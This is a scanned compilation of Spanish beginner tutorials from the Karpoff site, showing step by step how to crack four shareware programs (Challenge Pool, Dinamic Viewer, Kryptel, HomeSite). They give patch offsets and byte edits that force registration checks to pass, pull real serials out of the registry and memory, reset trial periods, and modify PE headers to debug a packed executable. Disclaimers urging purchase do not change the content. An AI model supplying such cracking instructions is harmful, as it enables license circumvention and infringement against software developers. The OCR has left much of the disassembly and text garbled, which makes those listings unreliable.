nos larga un lío de miedo y en la parte inferior de la ventana aparecen 3 opciones (leo de izquierda a derecha) fax/print order form 
para imprimir o enviar por fax el pedido del juego,el botón ok que es para pasar de rollos y ponerte a jugar, aunq verás q no puedes 
usar algunas modalidades de juego,lo cual lo hace todavía + malo, y nuestra opción enter registration code, le pegamos al botón 
(como dice el profesor_x) y nos aparece lo siguiente: 


Ok fale entonces, metemos nuestro número de serie, en mi caso 4041984 (la fecha de nacimiento de alguien especial para mí ,aunq 
como es para probar meted lo q os de la gana ; p), y acto seguido pulsamos ok y ... 


casi!, hombre creo q no esperaríais q funcionase, por ahora ...copiaremos lo q nos dice esta ventana de aviso y proseguiremos.de 
acuerdo entonces,antes de nada debemos hacer una copia de seguridad del fichero en cuestión(pool.exe) antes de comenzar a trabajar 
con el programa,lo habéis hecho ya? bien pues entonces arrancamos nuestro amigo el w32dasm y abrimos nuestro fichero en 
cuestión pool.exe, tras un momento + ó - breve dependiendo de vuestro ordenador, tendremos en pantalla el fichero abierto, ahora le 


damos al botón strref [Es una vez aquí observaremos con atención... 


W32Dasm List of String Data Items 


"Straight" 

"Successl" 

"SAW" 

"Ten Ball" 

"THE ABOUT NUMBERS ARE FOR CREDIT " 
"THE AUTHOR OF THIS PROGARA4M CANNOT " 
"the following ways:" 

"The Registration Code you entered ** 

"The shareware version of Challenge " 

"This is the shareware version 


buscamos en la ventana de diálogo algo parecido a lo q nos decía la ventana de error al tratar de registrarnos, y encontramos la string 
reference de la nag screen correspondiente. una vez la localizamos hacemos doble click sobre ella hasta aparecer en algo aberrante 


como esto: 
* Referenced by a (Ujnconditional or (C)onditional Jump at Address: 


1:00411885(0) 

| 

:0041188C 3309 xXOr ecx, ecx 
:0041188E 85C0 test eax, eax 
:00411890 OF95C1 setne cl 
:00411893 8409 test. el, el 
:00411895 7410 je 00411847 
:00411897 6400 push 00000000 
:00411899 6400 push 00000000 


* Possible StringData Ref from Data 0bj ->»"The Registration Code you entered " 
=>"is not correct, please try again." 


A E 400 OS OA O OS ES = E EXE 


impresiona verdad ?bueno, pues no nos dejemos intimidar por este trozo de código, si os parece vamos analizarlo... aparecemos en 
una línea q no sabemos q narices significa,no? bueno tómatelo con calma sabeis leer, no es cierto? encima de la línea resaltada pone 
algo como esto "the registration code you entered is not correct please try again" más arriba de esto pone: 


:0041188C 3309 xoOr ecx, ecx 
:0041188E 85C0 test eax, eax 
:00411890 OF95C1 setne cl 
:00411893 84C9 test. el, el 
:00411897 6A00 push 00000000 
:00411899 6400 push 00000000 


* Possible StringData Ref from Data 0bj ->"The Registration Code you entered " 


=>"is not correct lease t again." e dz G 
; ca de ajá!lun comprobación y después 


un salto condicional, os explico, el programa aquí lo q hace es comprobar si el serial q introdujimos es el correcto, de eso se encarga 
la orden test cl,cl , abajo de ella vemos q hay un salto condicional del tipo je(jump if equal) salta a otra zona del código(la de 
registrados)si el código q introdujímos es igual al verdadero entonces se aleja de la rutina de creación de ventana de error ,en caso 
contrario sigue 'leyendo' y llega a la famosa rutina de la ventanita,q hacer?cómo no se os ocurre nada?fácil, nosotros haremos q el 
programa acepte nuestro serial como correcto inviertiendo la comprobación, de forma q acepte por válidos los códigos incorrectos, 
pero tiene un inconveniente q es q el único código q no servirá será el verdadero. un poco chungo, no?mejor haremos q tome todos 
los códigos por válidos : ). para eso apuntamos su offset(si esq no estoy confundiendo palabras ya)de todas formas apuntamos ese 
numerito tan raro q aparece abajo 


vale pues en ese numerito tan raro va contenida la dirección correspondiente al salto q nos lleva a donde no queremos y q vamos a 
invertir.ok pues una vez q lo tenemos cerramos el w32dasm y arrancamos el hackers view una vez aquí vamos navegando por las 


carpetas de nuestro disco duro hasta la q contiene la copia de seguridad q hicimos, cuando lo localicemos lo abrimos, veréis q salen 
un follón de cosas sin sentido,no? ok pues pulsemos f4 y escogemos la última opción (o pulsamos 2 veces enter como dice x-faktor) 
una vez ahí vemos q lo q no tenía mucho sentido comienza a parecerse un poquito a la pantalla de nuestro amigo el 
w32dasm,verdad? vale pues ahora pulsamos la tecla f5 y escribimos el numerito raro de antes, ya sabéis 10c95 y pulsamos enter. 
aparecemos ahora exactamente en la misma línea del código q vimos con el w32dasm y q contiene el salto je q vamos a convertir en 
un jmps q es un salto q se realiza siempre sin tener nada q ver con la validez del código, para eso cambiamos el 7510 por eb10 
pulsando para ello f3 y una vez q hemos cambiado los datos le damos a f9. salimos del hackers view y arrancamos la copia 
modificada,introducimos cualquier serial q nos de la gana y ... 


bueno pues el programailla ha sucumbido ante nuestra superior inteligencia ; p, de todas formas no ha sido uno muy dificil, es el 
primero q conseguí crackear tras leer toneladas de manuales sobre cracking de todos los q se dignaron en escribir para nosotros los 
newbies. ok entonces pues ahora vamos a hacer los mismo pero sin modificar nada del programa, usando el soft-ice yo tengo la 
versión 4.05 q cogí de la página de karpoff, aunq también lo puedes encontrar en miles de sitios más. bueno pues lo q ahora vamos a 
hacer es usar una herramienta q windows nos sunministra, pero q no está al descubierto, para ello nos vamos al menú inicio, ejecutar 
y tecleamos regedit y nos aparecerá algo así... 


'' Editor del registro de configuraciones 


E- 8) Mi PC 
aa HKEY_CLASSES_ROOT 
0-3 HKEY_CURRENT_USER 
2 AppEvents 
(3 Control Panel 
(3 InstalllocationsMRU 
(2 keyboard layout 
3 Network 
a Software 
4-43 Arachnophilia 
(3 Audio Explosion 
1-3 Babylon 
61-43 BreakPoint 
ea Challenge Pool 
Sa 


[ab] (Predeterminado) [valor no establecido] 
(ab] Code "122-167" 


nos metemos en la carpeta q hace referencia a challenge pool y vemos otra dentro de dicha carpeta,pero vemos algo más, una clave 
de registro q dice 'code', pero vemos algo q no cuadra, no es ese el serial q introdujimos!!! el programa guarda en el registro de 
windows el verdadero serial xdddd, desde luego los encargados de la seguridad del programa no estaban muy interesados en 
preservar el verdadero serial,no creeis?bien pues ahora lo q hacemos es pinchar con el botón derecho en la clave q pone code, y la 
borramos, ahora el programa ha vuelto a dejar de estar registrado y listo para q ataquemos con nuestro compañero de peripecias el 
sice. bien después de haberle dado al symbol loader del sice y haber cargado el programa nos saldrá un error, no me pregunteis a q 
se debe porq no lo sé, pero si sé q no afectará para nada en nuestro trabajo.le damos a enter y aparece el sice en pantalla, pulsamos f5 
y arranca el challenge pool, le damos a la opción de registrar, introducimos el código y antes de darle a enter pulsamos ctrl+d y salta 
la pantalla negra y teneborsa del sice (en la q me estoy dejando la vista últimamente) ahora ponemos un breakpoint in execution (bpx 
para los colegas) talmente como este: 

bpx messageboxa 

ahora le damos a ctrl+d y volvemos al challenge pool ahora pulsamos enter y regresamos al soft-ice justo en la parte q hace q se 
genere la ventana de error,pulsamos f12 para ver quien ha llamado ha esta rutina y oh! nos hemos salido del soft-ice!!!!, no importa 
pulsamos enter y regresamos a él, ahora aparecemos en medio de un mogollón de cosas q no entendemos, bueno pues teniendo en 
cuenta la calidad de la protección del programa posiblemente no se hayan eliminado de la memoria ciertos datos q nos pueden ser 
útiles (digo supongo porq no estoy muy seguro de ello, recordad q soy novato aún) por tanto vamos a usar un comando del soft-ice q 
sirve para rastrear la memoria en busca de 'algo' q nos pudiese ser útil, bien pues tecleamos lo siguiente: s 30 1 ffffffff "número de 
serie q introdujimos" 

después del pulsar enter, el sice comenzará a buscar nuestro código en memoria y tras un breve intervalo de tiempo nos avisará de q 
lo ha encontrado, si miramos en la ventana de arriba a la derecha veremos nuestro código y si seguimos leyendo vemos ... como es 


posible!!! el código correcto!!! una vez más queda demostrada la eficacia del sistema de protección xd. lo q ha ocurrido es q el 
programa después de mandarnos la ventana de 'sigue rascando' no ha eliminado aún de la memoria los dos seriales q tiene q 
compara, el nuestro y el verdadero, bueno pues me temo q ya se ha acabado el programa, y como aconsejan los buenos crackers tras 
haber crackeado el programa deshazte de él, si te gusta cómpralo,no crees? aunq el programa no tenga un buen sistema de protección 
no quiere decir q los creadores no hayan derrochado mucho tiempo en éste para diseñarlo y programarlo, bueno este es mi consejo, 
ahora haced vosotros lo q os plazca... 

aprovecho para animaros a q escribáis vuestros propios tutoriales, venga q no es tan dificil, (va por tí x-faktor q tú también tienes 
hechos unos pocos y sabes también escribir tutoriales ; p, venga tío dale), también agradezco la paciencia de todos los del canal 
tfcrackers por soportar mis preguntas, a karpoff por sus tutoriales, así como también a mOniac_pc sin tu ayuda no me habría 
iniciado nunca de no ser por tus cursillos, argenbyte, demian por todos tus crackmes q no se crackear, pero oye al menos lo intento, 
profesor_x por tus compilaciones y tus tutoriales, son puro arte en verdad,a sable por su tutorial sobre el hmemcpy q no tengo ni idea 
de como usar, y a todos los q escribisteis para q aprendiésemos nosotros los newbies. también agradezco la oportunidad q me ha 
brindado kfor para ser uno de ellos, por todo esto gracias una vez más. 


' el bien refleja la luz, 
y el mal siembra, 
las semillas de la oscuridad, 
estos son los espejos del alma, 
los reflejos de la mente, 
elige bien... ' 


john keeper 


cualquier insulto,corrección, demanda o simplemente saludos, ruegos y preguntas a mi dirección de correo ¡keeperOcorreo.de 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Dinamic Viewer 1.55 


PROTECCION: Serial 
Descripcion: Reproductor de imágenes 
Dificultad: Facilucha, cuando supe como ;-) 


DOWNLOAD : http: //www.ctv.es/USERS/imedia 


Herramientas: Softice 


CRACKER: Yerba Mate ../10/2000 


introduccion 


seguramente te suena la dirección de e-mail. es la misma que hice referencia en el tutorial n? 3. de allí 
habíamos bajado 'imd cd player' e 'infotel'. pero fijate que curioso, este programa usa un sistema de 
protección que no tiene nada que ver con los anteriores. en realidad, es más parecido al del tutorial n*6, con la 
diferencia que en este ni siquiera tenemos un botón de 'ok' para oprimir. dinamic viewer es un programa bien 
logrado ( no es acdsee, de acuerdo ), pequeño y su precio es accesible, por lo que lo único que nos importará 
es su sistema de protección. no fue de esos cracks de 10 minutos, la ventana de registración logró 
confundirme bastante. siempre recordad que soy simplemente otro newbie tratando de enseñar lo que sabe. 


nuevamente te voy a contar lo hechos según fueron aconteciendo. venía de crackear infotel e imd cd player según lo 
visto anteriormente, casi no me bajo el dinamic viewer porque me empezaba a aburrir. la cuestión es que lo bajé lo 
corrí, pulsé en about y en registrar. esto es lo que obtuve: 


lfyo: 
or 1.000 


Informedi: 


Send e-mail to imedia( 


Su nombre Yerba Mate | 
Número de serie : [M2345578 | Cerrar 


notas que falta algo? le falta el botón de 'ok' , 'aceptar' o lo que fuera. esto me tuvo a maltraer durante bastante 
tiempo. introduje mis datos. mi primera deducción fue que comparaba dentro de un 'loop' contínuo el serial 
introducido por mí, con el que se genera a partir del nombre ( suena lógico, no? ). por más largo que fuera mi nombre 
o serial, no logré sacarle el mensaje de inválido. mi problema era como entrar en el soft-ice, ya estaba decidido a poner 
un bpxhmemcpy (como no mostraba mensaje alguno). como no tenía otro botón para oprimir excepto el de cerrar y 
ciertamente yo no lo quería cerrar, lo quería crackear ;-), hice lo siguiente. llené con mi nombre,puse todos los 
números de mi serial menos el último (el '8'), contol-d, bpxhmemcpy, f5 y finalmente el '8'. exito!!!!!.... entre en el soft- 
ice.desactivé el breakpoint con 'bd00". fuí de 'ret' en 'ret' con 'f12' hasta que llegué al 'dv!code' , al llegar allí con £10 
fuí trazando. econtré mi buscado loop. 


xxxx:445e01 8b03 mov eax, dword ptr (ebx) 

xxxx:445e03 e8ac2c0000 call 00448ab4 

xxxx:445e08 8b03 mov eax dword ptr (ebx) 

xxxx:445e0a 80b88400000000 cmp byte ptr (eax+00000084) , 00 
xxxx:445e11 740f je 00445e22 

xxxx:445e13 sb45fc mov eax , dword ptr (ebp-04) 

xxxx:445e16 c7802c02000002000000 mov dword ptr (ebx+0000022c) , 00000002 
xxxx:445e20 eb14 jmp 00445e36 

xxxx:445e22 8b45fc mov eax , dword ptr (ebx-04) 

xxxx:445e25 83b82c02000000 cmp dword ptr (eax+0000022c) , 00000000 
xxxx:445e31 e826fdffff call 00445b5c 

xxxx:445e36 sb45fc mov eax , dword ptr (ebp-04) 

xxxx:445e39 8b802c020000 mov eax , dword ptr (eax+0000022c) 
xxxx:445e3f 85c0 test eax, eax 

xxxx:445e41 74be je 00445e01 


por más que busqué en los registros no encontraba ni mi nombre, ni mi serial. trazaba dentro de los call con f8 y nada. 
si invertía algún salto para salir del loop y seguía trazando llegaba a un ret que me devolvía al programa pero sin la 
pantalla con los datos, como si hubiera pulsado el botón de cerrar. MMMMM...ooocccocccc... dura la vida del cracker........... 


lo único que había descubierto era la existencia de un achivo dvopt.cfg en la carpeta donde tenía instalado el dinamic 
builder. este archivo se crea la primera vez que corres el programa. si lo borrás volves a estar en el día cero del período 
de evaluación. es más si lo borrás, adelantás el reloj de tu pc unos 3 años, corrés el programa y reestableces el reloj a la 
fecha actual, tendrás más de 1800 días para evaluar el programa. trataba de conformarme con eso ( ..que va a ser.. ) 
pero no daba resultado. 


la existencia de san cracker martir, velando por nosotros en las largas noches de cracking, queda práticamente 
demostrada a continuación ;-) 


en otro infructuoso intento de sacarle el serial sin resultado alguno, me había quedado puesto el bpx hmemcpy en el 
soft-ice cuando cerré la ventana de datos con intención de apagar la pc. entró el soft-ice (por voluntad propia, nada de 
zen cracking) ...Y.......... buehhh........... ya que estaba, empecé a trazar el código nuevamente. ahí lo ví, un glorioso 
ad24111111. todo era claro ahora. encontraba con facilidad mi nombre, mi falso serial, el verdadero, la comparación 


entre ambos y justo debajo un call y un salto condicional que no se efectuaba. 


004 7CDEC 8B45F3 mov eax, dword ptr 
:0047CDEF SD55FC lea edx, dword ptr 
:D0047CDF2 ESOS5100100 call 0048DDFC 
:0047CDF7? SD55FS lea edx, dword ptr 
:0047CDFA A124794900 mov eax, dword ptr 
:0047CDFF SBS8DE0020000 mov eax, dword ptr 
:0047CEO5 ESS6F9FAFF call 00420790 
:0047CEOA SBS55FS mov edx, dword ptr 
:0047CEOD 8B45FC mov eax, dword ptr 
:0047CE1O0 ES17?71FSFF call 00403F2C 
:0047CE15 OFS550010000 jne 0047CF6B 


[ebp-08] Yerba Mate 
[ebp-04] 

[ebp-08] 

[00497924] 

[eax+00000ZE0] 

[ebp-08] 12345678 
[ebp-04] AD24111111 


¿que es lo que pasó? el programa necesita que pulses el botón de cerrar para evaluar los datos introducidos. si en 
lugar de decir 'cerrar' hubiera dicho 'ok' o 'aceptar' todo hubiera sido simple. el programador logró confundirme con ese 


simple truco. 


tal vez aprendiste algo nuevo o simplemente te sonreiste un rato. lo que te quise mostrar aquí es que no siempre 
encontrarás el serial en el primer intento. aún cuando la protección sea simple. guarda el programa en algún lugarsito 
del 'rígido' (no, no lo borres). seguí leyendo tutoriales, seguí practicando, en fín seguí aprendiendo.y cada tanto intentá 
crackearlo nuevamente. la felicidad de encontrar el serial válido bién vale el esfuerzo. 


por dudas o consultas comunicate a http://yerbamatear O yahoo.com 


espero que este tutorial te haya sido útil, nos vemos en el próximo 


yerba mate 


' todo es fácil cuando se sabe como' 


importante: lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, no como robar alguna 
propiedad. si vas a usar este programa debes comprarlo. si no fuera por los programadores de shareware 


no tendríamos con que entretenernos. 


karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Kryptel 3.62 

PROTECCION: Serial 8 Trial 30 

Objetivo: Simular Estar Registrados 
Kryptel 3.62 es un software de encriptación de datos (su nombre ya lo 

Descripcion: dice...) que según sus autores protege con un algoritmo muy difícil de 
romper 

Dificultad: Facil 

DOWNLOAD: bttp:/finv*,co.naf 

Herramientas: Wdasm 8.9, Softice 4.5, UltraEdit32 6, PMaker 

CRACKER: BugSys FECHA: 22/10/00 

introduccion 


bueno, pues aquí estoy con un nuevo tutorial para principiantes. espero que el del 
readiris se haya entendido y haya sido útil. 


kryptel 3.62 es un software de encriptación de datos (su nombre ya lo dice...) que 
según sus autores protege con un algoritmo muy difícil de romper (ellos dicen 
imposible :-) )cualquier archivo que tengamos y al que no queremos que nadie tenga 


acceso. la encriptación se hace en función de una clave tan complicada como nosotros 
queramos, con la ventaja de que el interface es muy sencillo y se parece al 
explorador de windows. 

ya que se trata de un programa de encriptado, se supone que la protección será 
interesante y enrevesada ¿no?. un programador capaz de hacer algo así también sabrá 


proteger su software... 


al atake 
estudiando el objetivo 


pues eso, instalemos el kryptel en nuestro ordenador y ejecutémoslo como siempre... aparece la típica pantallita que 
nos dice que es una versión de evaluación, que nos quedan 30 días de prueba y esas cosas. damos a ok y jugamos un 
poco con el programilla... parece útil para esconder ciertas cosillas de los curiosos. 


hacemos lo de siempre, adelantar el reloj dos o tres meses y ver que pasa.... sale una pantalla que dice que ha caducado 
y que no quiere volver a funcionar mientras no le introduzcas un serial válido. ahora podemos hacer dos cosas: 
buscarnos el serial o buscamos la comprobación que le dice que lo hemos registrado... personalmente prefiero la 
segunda porque es más rápido y deja más tiempo para hacer otras cosillas... 


primera sorpresa: 


cómo el programa ya ha caducado, volvamos a poner el reloj del ordenador en hora para evitar problemas con otras 
aplicaciones. por curiosidad ejecutamos otra vez el brw.exe y vemos que aún nos quedan 30 días de prueba (¿? ...si 
había caducado...); genial, sólo mira la fecha y la compara con algo, pero no escribe en ningún sitio que ha caducado, 
con sólo cambiar la fecha ya funciona siempre. :-) 


segunda sorpresa: 

bueno, no puede ser tan fácil... seguro que tiene truco en algún sitio, así que vamos a desensamblarlo con el wdasm y 
ver las sref para ver que podemos hacer por ahí ( nos interesan las que dicen ''wrong registration code'' (para los que 
no sepan inglis pitinglis "código de registro incorrecto'') y la que dice 'the evaluation period has expired" ("el 


período de evaluación ha expirado"'). haciendo doble click sobre ellas aparecemos en el código que transcribo editad 
o a continuación: 


:00404106 ff1578484100 call dword ptr [00414878] 

:0040410c a17c234100 mov eax, dword ptr [0041237c] 

:00404111 390578234100 cmp dword ptr [00412378], eax 

:00404117 7510 jne 00404129<- ¡oops! caliente caliente 

:00404119 85c0 test eax, eax 

:004041 1b 750c ¡ne 00404129<- ¡otra vez! 

:0040411d c6059034410001 mov byte ptr [00413490], 01<-se parece a un flag... 
:00404124 e9d5000000 ¡mp 00404 1fe<- nunca formará la messageboxa si llega hasta aquí ahora. 
:00404129 8b0d742b4100 mov ecx, dword ptr [00412b74] <- rutina que se ejecuta cuando no estamos registados 
:0040412f 8b155c2b4100 mov edx, dword ptr [00412b5c] 

:00404135 3bca cmp ecx, edx 

:00404137 7f6d jg 00404146 <- salta si ecx es mayor que edx (superados los 30 días) 
:00404139 a1702b4100 mov eax, dword ptr [00412b70] 

:0040413e 7c08 jl 00404148 <-salto normal si no ha caducado 

:00404140 3b05582b4100 cmp eax, dword ptr [00412b58] 

:00404146 775e ja 00404146 <- cuidadín con esta dirección 

:00404148 8b1d582b4100 mov ebx, dword ptr [00412b58] 

:0040414e 2bd8 sub ebx, eax 

:00404150 8bf2 mov esi, edx 

:00404152 1bf1 sbb esi, ecx 

:00404154 bf92170000 mov edi, 00001792 


:00404159 3bf7 cmp esi, edi 


:0040415b 7149 jg 004041a6<- salta si esi es mayor que edi (segunda comprobación de superados los 30 días por si has superado la 
primera ) 


:0040415d 7c08 jl 00404167<-salto normal si no ha caducado (pero lleva el flag a 0 -> versión evaluación) 
:0040415f 81fb008064f8 cmp ebx, f8648000 
:00404165 773f ja 00404146 <- última comprobación que nos lleva a esta dirección 


:00404167 2b05582b4100 sub eax, dword ptr [00412b58] 


o dee ole ole oe le ode ad ole ale 


* reference to: user32.postmessagea, ord:01b1h 


:0040419e £f1538474100 call dword ptr [00414738] 


:004041a4 eb58 ¡mp 004041fe 


o dele ole ode oe le ode ad ole ale 


* possible reference to string resource id=00570: "the evaluation period has expired! <- aquí está la referencia 


please, register the sof"' 


dls ae led e 


:004041d2 683a020000 push 0000023a 
* reference to: user32.messageboxa, ord:0195h 


:004041f8 ff158c474100 call dword ptr [0041478c] 


ahora llega el momento de pensar un ratito... sabemos seguro que si se ejecutan las llamadas a postmessagea y 
messageboxa no vamos a ningún lado, así que habrá que buscar hacia arriba algo que le diga que no vaya a esa 
dirección o a sus cercanías... (jn,¿jnz, jg , jge, ja y similares). este método es el típico "de libro", y aparece en 
muchos programas shareware y en algunas aplicaciones comerciales (échale un vistazo a la demo del vegas pro de 
sonic foundry y verás..) 

. Creo que no hace falta decir lo que hay que hacer con esos dos saltos condicionales, así que carga el ultraedit y 
cambia esos 75 tan feos por algo más bonito, no sé.. un 90 quizás (nop). 


fijaros en la instrucción que aparece señalada en verde antes del salto incondicional. lo que hace es poner un uno en esa 
dirección de memoria señalando que estamos registrados y que hemos pagado por el programa, si cambias el 01 por 00 
con el softice mira lo que pasa... a ese tipo de instrucciones es a lo que se le llama flag, y más o menos funciona como 
un semáforo O = rojo y 1 = verde.. :-)... 


la razón de elegir esos puntos para poner nuestro parche es porque los demás condicionales que hay por debajo son los 
encargados de verificar las fechas del ordenador y otra interna del programa (almacenadas en ecx y edx que da la 
impresión de que están encriptadas..), si la primera es mayor salta a 404146 y nos deja sin programa, sino continúa y 
aún hace dos verificaciones más antes de llevarnos a 4041fe con el flag puesto a O (no estamos registrados). si 
hubiésemos parcheado más abajo en los jg para que nunca saltase a 404146 lo único que habríamos hecho es conseguir 
que nunca mostrara la pantalla de caducidad ni dejara de funcionar, pero seguiría siendo una versión de evaluación. 


Ok, ahora con el brw.exe parcheado vamos a ejecutarlo. ya no aparece la nag que recuerda que es una versión de 
evaluación... y ya no aparece lo de evaluation copy en la ventana.... !, vamos al about y dice que la copia está 


licenciada a alguien... como se puede ver la comprobación de si estamos registrados o no y si la fecha es correcta o no 
están juntas y pegaditas a la línea que nos avisa que ha caducado ... 


bueno, pues sólo nos queda buscar la forma de meter nuestro nombre en el about. lo ponemos en el kryptel.ini y listo, 
pero visto lo visto, vamos a echar un vistazo al codigo que nos dice que el serial no es válido: 


:004012a2 es7d000000 call 00401324 

:004012a7 83c40c add esp, 0000000c 

:004012aa 84c0 test al, al 

:004012ac 752d ¡ne 004012db <-más de lo mismo 

:004012ae 6810200000 push 00002010 

* possible stringdata ref from data obj ->"registration error"| <-caption de la messageboxa 
:004012b3 682c214100 push 0041212c 

* possible stringdata ref from data obj ->""wrong registration code." <- el string de marras 
:004012b8 68d0204100 push 00412040 

* referenced by a (u)nconditional or (c)onditional jump at address: 

1:0040127c(u) 

:004012bd f£7508 push [ebp+08] 


* reference to: user32.messageboxa, ord:0195h 


sobra decir lo que hay que hacer para que acepte cualquier cosa que le metas..... si sigues mirando hacia arriba hay un 
código exactamente igual para el nombre. 


resumiendo: 

para conseguir que el kryptel nos reconozca como usuarios registrados hay que anular los dos saltos condicionales en 
404117 y 404124, y para que nos admita cuaquier serial el que hay en 4010ac convertirlo en un salto incondicional. fin 
de la historia del kryptel. 

reflexiones: 

un software de encriptación que dice ser indescifrable, por lo menos debería dar algo más de trabajo, al suponerse que 
el programador tiene conocimientos suficientes para proteger como dios manda su programa. de todas las protecciones 
que he tratado en el poco tiempo que llevo en esto, está es la más fácil de cascar con diferencia.., pero se agradece que 
aún haya software así para pasar el tiempo y que los newbies aprendamos... no todo van a ser achivos pe, vbox y 
antidebuggers (últimamente las pillo todas juntas ...). 


recordad que si vais a utilizar este programa deberéis comprarlo. 


las acciones aquí descritas lo son con fines educativos. su puesta en práctica va en contra de la ley de derechos de autor 
y está penado. 


próximamente : protección de allaire homesite 4.5 y creación de un loader con rpp. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Allaire HomeSite 4.5a 

PROTECCION: Caducidad a los 30 días 

Objetivo: Simular Estar Registrados 

Descripcion: HomeSite 4.5 es un software de edición de páginas web 

Dificultad: Facil - Intermedio 

DOWNLOAD : http://www.allaire.com 

Herramientas: Wdasm 8.9, Softice 4.5, UltraEdit32 6, RPP 

CRACKER: BugSys FECHA: 22/10/00 
INTRODUCCION 


homesite 4.5 es un software de edición de páginas web. incluye editor html para 
aquellos que controlen realmente ese lenguaje, editor wysiwyg para los comodones de y 
previsualizador (browser) que se comporta como el iexplorer. si se combina con el 
dreamweaver de macromedia se pueden crear sites realmente impresionantes, ya que 
soporta css, asp, cfm, sql y un montón de cosas más. quizás sea más complicado de 
usar que el dreamweaver, pero una vez que te haces con él es difícil dejar de 
utilizarlo... 

la protección que trae es una limitación de 30 días, tras los cuales aparece una 
ventana que nos recuerda que ha caducado pero nos permite seguir usándolo, 
advirtiéndonos que si lo hacemos estamos violando el contrato de licencia. 

lo que tendremos que hacer para una evaluación más tranquila es eliminar las nags de 
incio con el logo de allaire, la ventana que sale cuando caduca, retocar el caption 
de la ventana principal y eliminar el dialogo about. 


al atake 


en fin, manos a la obra. tras descargar el programa de la web de allaire o buscarlo en los cd que haya por casa ( mi 
versión la saqué del cd shareware que venía en pc actual de abril de 2000) lo instalamos, vemos cómo funciona y lo 
que trae de protección: en principio nada del otro mundo, un par de nags amarillas con una cuenta atrás de los días que 
quedan para que caduque y poco más. adelantamos el reloj 60 días y es cuando aparece la ventana que nos dice que 
seguir usándolo violaría el contrato de licencia. ok, tres nags que hay que eliminar. 


primer problema: 


vamos a echarle un vistazo al código. cargamos el w32dasm, abrimos homesite45.exe y la hemos cagao, se queda 
colgado y no sale nada. seguimos como al principio. con el w32dasm no podemos hacer nada (de momento.. ;-p). 


segundo problema: 


si no se puede hacer nada con el programa fiambre, le hacemos una biopsia y listo. pues tampoco. al cargarlo con el 
loader de softice este no salta y nos quedamos con cara de tontos mirando para la pantalla. de momento hay que seguir 
estudiando el ejecutable para ver por donde entrarle. 


aproximándonos a la víctima: 


para este paso necesitaremos la herramienta gettype, o en su defecto el exescan, ambos disponibles en muchos sitios. el 
comando a utilizar con el gettype sería: 


c:> gtw homesite45.exe /ze (los path serán los que tu tengas en el ordenador) 
y obtenemos lo siguiente: 
> H gettyp 2.592 H > +* copyright (c) 1997-99 by phax + --- 


- --- H phaxOwriteme.CcOM $ + http://surf.to/phax + --- 


o + free edition + --- 


- [c:¡herramientashome.exe] ----- 

dos executable file - 1457152 bytes 

portable executable (starting at 256 for 1456896 bytes)<- es un archivo pe 
compiler: borland delphi 3/4 (heuristic) 

calculated entrypoint: 1432577 / 0O15dcO1h (rva: 004d4001h) 
required cpu type: 80386 

requires any version of win32 

flags: 

file is executable 

line numbers stripped from file 

local symbols stripped from file 

32 bit word machine 

linker version: 2.25 

objects (object align = 00001000h): 

name virt size rva phys size phys ofs 


code 00305000h 00001000h 0010ca00h 00000400h 


data 00021000h 00306000h 00003000h 0010ce00h 
bss 00007000h 00327000h 00000000h 0010fe00h 
.idata 00004000h 0032e000h 00001600h 0010fe00h 
.tls 00001000h 00332000h 00000000h 00111400h 
.rdata 00001000h 00333000h 00000200h 00111400h 
.reloc 0002f000h 00334000h 00000000h 00111600h 
.rsrc 00171000h 00363000h 0004c600h 00111600h 
.aspack 00006000h 004d4000h 00006000h 0015dc00h <- y está comprimido con aspack v?? 
.rsrc 00001000h 004da000h 00000000h 00163c00h 
- files identified: 1 of 1 (100.00%) 

- total time: 60.0 ms (60.0 ms/file) 


bueno, ya sabenos que tenemos entre manos un archivo comprimido con aspack... del que hay varias versiones pero 
esta no la detecta.(la versión 4.0 estaba comprimida con shrink... tutorial de d.a en la página de karpoff) 


con esta información podríamos acudir al procdump y descomprimirlo con el script adecuado para aspack , pero como 
no se la versión y no voy a probarlas todas , me conformaré con que lo carge el loader del sice para la biopsia.(de todas 
formas mi versión del p.d. no fué capaz de desempacarlo cuando conseguí saber la versión). 


la otra solución es bajarse de protoolz el descompresor específico para aspack , que lo identifica como comprimido con 
aspack2000. no sirve de nada porque tras preparar el ejecutable para el w32dasm no aparecen los strings que nos 
interesan y que posiblemente estarán en una librería como los iconos. eso sí , obtenemos un ejemplar descomprimido 
que nos facilitará las cosas más adelante al trazarlo con el softice.. 


el procesado del ejecutable para que se carge en el w32dasm y en el loader del debugger es el siguiente: 


con el procdump cargado vamos a pe editor -> sections y clickeamos con el botón derecho del ratón sobre la sección 
code del ejecutable, y nos aparece la siguiente pantalla: 


Sections Editor 


Sections Informations : 


00305000 00001000 00000400 Co000040 
00021000 00306000 00003000 D010CED0 C0000040 
00007000 00327000 0000000 DO10FEDO Co000040 
00004000 0032€000 00001600 D010FEDO Co000040 
00001000 00332000 00000000 00111400 20000040 
00001000 00333000 00000200 00111400 Co0000040 


Modify section value 


Section informations 


Name [coDe 
WSize [00305000 Aa  J00001000 


PSize [001 0C400 Difset [00000400 
Section Characteristics : [coo00040 Cancel 


si quieres saber más sobre los datos que aparecen ahí, lee los tutoriales sobre el procdump que hay en el ecd. a nosotros 
nos interesa section characteristics y su valor. el c0000040 lo cambiamos por e0000060, que activa las características 
image_scn_ent_code y image_scs_mem_execute para la sección code del ejecutable (más información en los otros 
tutoriales sobre archivos pe), de forma que podamos cargarlo con el loader para ver cómo funciona. prueba ahora y 
verás, ¿a que ya salta el softice?... ;-), pués ahora empieza la diversión.... 


la estrategia: 


recordemos que necesitamos deshacernos de dos nags amarillas exactamente iguales que aparecen al principio y la que 
anuncia que ha caducado. para ello utilizaremos mi comando favorito para cargarme ventanas hwnd. seguramente no 
descubra nada nuevo, pero son pocos los tutoriales sobre nags que hablan de esta función, mucho más eficaz y versátil 
que las típicas messageboxa y similares que se suelen mencionar siempre. 


cuando escribimos el comando hwnd nos aparece una lista con todas las ventanas y componentes de estas (botones, 
cajas de texto...), con su handle, programa al que pertenece, dirección y nombre (muchas veces muy ilustrativo). lo 
único que hay que hacer es elegir la que nos interesa (suele ser la primera que aparece con el nombre del programa que 
